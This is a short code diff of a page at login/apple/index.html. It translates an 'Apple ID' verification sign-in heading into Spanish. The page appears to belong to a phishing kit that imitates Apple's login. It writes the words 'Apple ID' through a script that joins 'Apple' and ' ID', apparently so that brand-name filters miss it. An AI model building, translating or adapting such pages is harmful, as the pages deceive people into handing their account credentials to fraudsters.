--- a/login/apple/index.html
+++ b/login/apple/index.html
@@ -220,7 +220,7 @@
         <div class="grid2colc wrap">
 
           <div class="column first sidebar">
-            <h2>Please sign in to verify your
+            <h2>Por favor ingresa a tu cuenta para verificar
               <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT>
             </h2>
             <p class="intro">
